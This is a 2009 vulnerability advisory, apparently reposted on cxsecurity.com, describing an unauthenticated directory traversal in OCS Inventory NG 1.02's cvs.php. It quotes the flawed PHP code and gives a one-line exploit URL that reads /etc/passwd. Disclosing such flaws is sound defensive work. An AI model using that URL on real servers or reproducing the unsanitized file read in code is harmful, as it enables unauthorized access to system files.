OCS Inventory NG 1.02 - Directory Traversal

2009-06-03 / 2009-06-04
Credit: Nico Leidecker
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

OCS Inventory NG - Directory Traversal (May 30 2009) * Product Open Computer and Software (OCS) Inventory NG (http://www.ocsinventory-ng.org) * Vulnerable Versions OCS Inventory NG 1.02 (Unix) * Vendor Status Vendor has been notified and the vulnerability has been fixed in version 1.02.1. * Details The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It is possible for unauthenticated users to extract arbitrary files from the hosting system due to inadequate file handling in cvs.php. cvs.php: } elseif (isset($_GET['log'])){ if (file_exists($_GET['rep'].$_GET['log'])){ $tab = file($_GET['rep'].$_GET['log']); while(list($cle,$val) = each($tab)) { $toBeWritten .= $val."\r\n"; } $filename=$_GET['log']; } } * Impact Attackers may be able to read arbitrary files from the hosting system. * Exploit The vulnerability can be exploited by just using a web browser: http://example.org/ocsreports/cvs.php?log=/etc/passwd http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_directory_traversal.shtml Nico Leidecker - http://www.leidecker.info

References:

http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_directory_traversal.shtml


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top